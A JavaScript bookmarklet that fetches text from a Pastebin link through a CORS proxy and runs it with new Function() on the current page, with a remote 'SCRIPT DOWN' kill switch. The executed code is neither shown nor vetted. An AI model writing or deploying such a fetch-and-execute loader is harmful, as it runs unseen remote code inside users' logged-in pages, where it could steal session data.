javascript:(()=>{
  const url = "https://api.allorigins.win/raw?url=" + encodeURIComponent("https://pastebin.com/raw/5PVRtwqR") + "&_=" + Date.now();
  fetch(url)
    .then(response => {
      if (!response.ok) throw new Error("Network response was not ok");
      return response.text();
    })
    .then(code => {
      const trimmed = code.trim();
      console.log("Fetched content:", JSON.stringify(trimmed));
      if (trimmed === "false") {
        alert("⚠️⚠️⚠️ SCRIPT DOWN ⚠️⚠️⚠️");
        return;
      }
      if (!trimmed) {
        alert("⚠️ Fetched script is empty!");
        return;
      }
      try {
        new Function(trimmed)();
      } catch (e) {
        console.error("Error executing fetched script:", e);
        alert("⚠️ Script execution error: " + e.message);
      }
    })
    .catch(error => {
      console.error("Fetch error:", error);
      alert("⚠️ Failed to fetch script. Check your connection or URL.");
    });
})();
